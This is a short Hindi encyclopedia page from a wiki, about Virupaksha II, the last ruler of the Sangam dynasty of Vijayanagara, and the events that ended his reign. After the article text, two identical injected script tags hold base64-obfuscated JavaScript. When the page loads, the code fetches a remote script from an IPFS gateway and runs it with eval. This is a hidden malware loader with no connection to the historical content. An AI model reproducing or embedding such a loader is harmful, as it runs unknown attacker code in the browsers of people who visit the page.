विरुपाक्ष द्वितीय
भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 15:12, 9 जून 2011 का अवतरण
- विरुपाक्ष द्वितीय (1465-1485 ई.) संगम वंश का अन्तिम शासक था।
- मल्लिकार्जुन के उत्तराधिकारी विरुपाक्ष द्वितीय के शासन काल में विजयनगर से गोवा, कोंकण एवं उत्तरी कर्नाटक के कुछ भाग अलग हो गये।
- ऐसी स्थिति में जबकि, विजयनगर राज्य टूटने की स्थिति में आ गया था, चन्द्रगिरी में गवर्नर पद पर नियुक्त सालुव नरसिंह ने विजयनगर राज्य की रक्षा की।
- 1485 ई. में विरुपाक्ष की हत्या उसके पुत्र ने कर दी।
- एक मत के अनुसार विरुपाक्ष की हत्या उसके दुराचारी होने के कारण उसके बड़े पुत्र ने की थी।
- पुर्तग़ाली यात्री 'नूनिज' के अनुसार- 'इस समय विजयनगर में चारों ओर अराजकता एवं अशान्ति का माहौल था'।
- इन्हीं परिस्थितियों का फ़ायदा उठाकर सालुव नरसिंह के सेनानायक 'नरसा नायक' ने राजमहल पर क़ब्ज़ा कर लिया।
- नरसा नायक ने सालुव नरसिंह को राजगद्दी पर बैठने के लिए निमंत्रण दिया।
- इस घटना को विजयनगर साम्राज्य के इतिहास में प्रथम ‘बलापहार’ कहा गया है।
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>